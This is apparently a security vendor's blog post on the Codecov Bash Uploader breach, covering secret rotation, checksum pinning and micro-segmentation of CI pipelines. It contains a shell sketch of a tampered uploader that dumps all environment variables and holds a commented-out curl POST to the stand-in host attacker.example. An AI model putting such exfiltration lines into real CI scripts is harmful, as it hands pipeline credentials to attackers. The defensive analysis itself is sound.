
Codecov Takeaways — What We Know So Far

Not that anyone needed reminding so soon, but the recently announced breach of Codecov’s toolset, which supports Continuous Integration (CI) processes across many organisations, again highlights the vast density of interdependencies that exist today and the resultant exposure to supply chain attacks.

Further, the often implicit faith in software provided by trusted suppliers means that customers do not adequately test what an update does, both locally on the host and in terms of network connectivity and data transfer. All of this means that, more often than not, the software running in organisations is not fully understood.

How is this relevant to what happened with Codecov?

Codecov provides reporting capabilities that can be integrated into customers’ CI pipelines — specifically, their tools report on the amount of code that is executed as part of testing, helping identify gaps in the validation process. These metrics are then uploaded to their SaaS platform for reporting and analytics.

The data upload is facilitated by scripts known collectively as “Bash Uploaders,” which are executed as part of the CI process. These Uploader scripts, should they be tampered with, provide an opportunity for an attacker to not just redirect the upload to a server of their choice, but to also specify what data they want to be included, making anything available to the CI process potentially accessible.
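To make the exposure concrete: a tampered uploader needs only a couple of extra lines to harvest and exfiltrate the environment. The following is a minimal sketch of that class of modification, not the actual altered script; the attacker URL is hypothetical and the network call is left commented out so the sketch performs no I/O:

```shell
#!/usr/bin/env bash
# Sketch of the kind of addition an attacker could make to an uploader
# script run inside a CI job. Illustrative only; the URL is hypothetical.

ATTACKER_URL="https://attacker.example/upload"

# Collect every environment variable visible to the CI job into one payload.
payload="$(env)"

# The malicious step would POST that payload to the attacker's server,
# alongside the legitimate upload, e.g.:
#   curl -sm 5 -X POST --data-binary "$payload" "$ATTACKER_URL"
# (commented out here so this sketch makes no network connection)

printf '%s\n' "$payload" | wc -l   # number of captured variables
```

A single `env` call is all it takes: anything injected into the job's environment, including credentials, is in scope.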

In the case of Codecov, the initial compromise came through a leak of Google Cloud Storage credentials, exposed by an error in Codecov’s Docker image creation process. These credentials allowed the attacker to post a modified version of the Bash Uploader script, altered to harvest the contents of all environment variables available to the CI process in which it was executed and upload them to the attacker’s own server.

Given that this modified script was available directly from Codecov’s site, it was presumably trusted by customers and downloaded and integrated with little validation. Environment variables in the CI process are typically used to insert relevant secrets into code to access the resources it needs at run time. The malicious Uploader script would thus have access to these and be able to transfer them to the attacker, providing them with a healthy harvest of credentials and other sensitive information.
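One simple form of validation is to pin the downloaded script to a known-good digest and refuse to run anything that does not match. A hedged sketch, assuming the vendor publishes checksums through a trusted out-of-band channel (the stand-in file and digest below are created locally purely for demonstration):

```shell
#!/usr/bin/env bash
# Sketch: verify a downloaded CI script against a pinned SHA-256 digest
# before executing it. The expected digest should come from a trusted,
# out-of-band source (e.g. the vendor's signed release notes).

set -euo pipefail

verify_script() {
  local file="$1" expected="$2" actual
  actual="$(sha256sum "$file" | awk '{print $1}')"
  if [ "$actual" = "$expected" ]; then
    echo "checksum OK: $file"
  else
    echo "checksum MISMATCH: refusing to execute $file" >&2
    return 1
  fi
}

# Demonstration with a locally created stand-in for the uploader:
uploader="$(mktemp)"
printf 'echo "uploading coverage report"\n' > "$uploader"
pinned="$(sha256sum "$uploader" | awk '{print $1}')"

verify_script "$uploader" "$pinned" && bash "$uploader"
verify_script "$uploader" "tampered-digest" || echo "script was not run"
```

This does not stop every supply chain attack, but it would have turned a silently modified script into a hard pipeline failure.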

Even without further persistent network access – and there is no indication yet as to whether the breach establishes this – these secrets are a treasure chest, given that they provide access to a number of internet-accessible resources, such as storage buckets, databases, and other cloud services that the associated applications used. These, too, are now likely compromised.

At a bare minimum, any organisation that believes it may have incorporated the compromised Bash Uploader scripts into its CI pipeline should, as a matter of urgency, reset all the secrets that the pipeline had access to. This will almost certainly require a redeployment of affected applications to ensure that they have received the updated secrets, but the overhead of this approach is preferable to prolonging the exposure of stolen credentials.
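That rotation pass can be scripted. A sketch of the shape of it, where the secret names are illustrative and `rotate_secret` is a placeholder standing in for whichever secrets manager an organisation actually uses:

```shell
#!/usr/bin/env bash
# Sketch of an urgent rotation pass: enumerate every secret the CI
# pipeline could read and rotate each one. Names and the rotate_secret
# body are placeholders for your own secrets manager.

set -euo pipefail

# Secrets typically exposed to a CI job via environment variables
# (illustrative names only):
CI_SECRETS=(AWS_ACCESS_KEY_ID DOCKERHUB_TOKEN DB_PASSWORD NPM_TOKEN)

rotate_secret() {
  # Placeholder: call your secrets manager here, e.g. something like
  #   aws secretsmanager put-secret-value --secret-id "$1" --secret-string "$new"
  echo "rotated: $1"
}

for s in "${CI_SECRETS[@]}"; do
  rotate_secret "$s"
done

echo "Now redeploy affected applications so they pick up the new values."
```

The key point is the enumeration: the rotation is only complete once every secret visible to the compromised jobs is on the list.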

Beyond the exfiltration of secrets, the persistent privileged access afforded to the CI pipeline is ripe for abuse. By definition, the pipeline’s responsibility is to generate new software builds and publish these to repositories. Compromise of the pipeline infrastructure itself affords the attacker the ability to alter the contents, potentially inserting backdoors for later use either on downstream systems or within generated artifacts. So how much rebuilding needs to be done in order to be confident that all traces of the attacker and their tentacles are removed?

Next, it’s worth looking at the network access available to the CI infrastructure. Typically, it has direct access to other key components, including but not limited to version control, monitoring infrastructure, automated testing, the build process, configuration management, and continuous deployment. Also, with the heavy use of FOSS components, the CI pipeline often needs internet access to public repositories to pull in relevant dependencies.

With the dense connectivity requirements that the CI pipeline demands, can segmentation still serve as a valuable security control?

When considering the value of micro-segmentation, it can be presented in two ways:

  1. Micro-segmentation allows for high-value assets to be ring-fenced, ensuring their exposure to and from the rest of the network is limited, thus making it more difficult for an attacker to reach and exploit them.
  2. Micro-segmentation allows for every workload to have its own least-privilege access rule-based microperimeter encircling it. This ensures that, if it is compromised, the attack surface exposed to it is limited to only what it’s authorised to connect to – ultimately limiting what an attacker could do next.

One approach for making this relevant to the CI pipeline looks something like this:

  • The CI pipeline is definitely a high-value asset and one that should be ring-fenced.
  • While it may have a number of internal and external dependencies from a connectivity perspective, these should be well understood and well defined.
  • Using this information, an allowlist-based micro-segmentation policy could be built to ensure that the CI pipeline only has access to and from these well-understood dependencies.
  • If internet access is required, it should be allowed only to a list of approved repositories, not granted as unfettered internet access. Restricting egress to an explicitly defined list of destination sites is an effective and often simple control to mitigate command-and-control (C&C) and data exfiltration attempts.
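The policy the bullets above describe is, at heart, an explicit allowlist with default deny. A minimal sketch of the idea, using illustrative internal and external destinations; in a real deployment the enforcement lives in the segmentation or firewall layer, not in a script:

```shell
#!/usr/bin/env bash
# Sketch of an allowlist-based egress policy for the CI pipeline:
# traffic is permitted only if it matches an explicit rule. Hostnames
# and ports are illustrative examples, not real infrastructure.

set -euo pipefail

# Each rule: a "destination:port" the CI pipeline may reach.
ALLOW_RULES=(
  "git.internal.example:443"        # version control
  "artifacts.internal.example:443"  # build repository
  "registry.npmjs.org:443"          # approved public repository
  "pypi.org:443"                    # approved public repository
)

egress_allowed() {
  local want="$1:$2" rule
  for rule in "${ALLOW_RULES[@]}"; do
    if [ "$rule" = "$want" ]; then
      return 0
    fi
  done
  return 1   # default deny: anything not listed is blocked
}

egress_allowed pypi.org 443         && echo "pypi.org:443 ALLOW"
egress_allowed attacker.example 443 || echo "attacker.example:443 DENY (default)"
```

Under such a policy, a tampered uploader attempting to reach an unapproved server simply fails to connect, regardless of what data it has gathered.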

This protects the CI pipeline from being accessed by unauthorised devices or over unauthorised ports and protocols. It also ensures that, in the case of compromise of the CI pipeline, the exposure to the rest of the network is limited. Moreover, improved segmentation controls often go hand in hand with significantly better visibility into system interactions, providing richer data for incident detection and response teams to work with when investigating potential breaches.

At Illumio, we help customers leverage micro-segmentation to establish this containment and monitoring. Reach out to your account team to find out how we can support you.
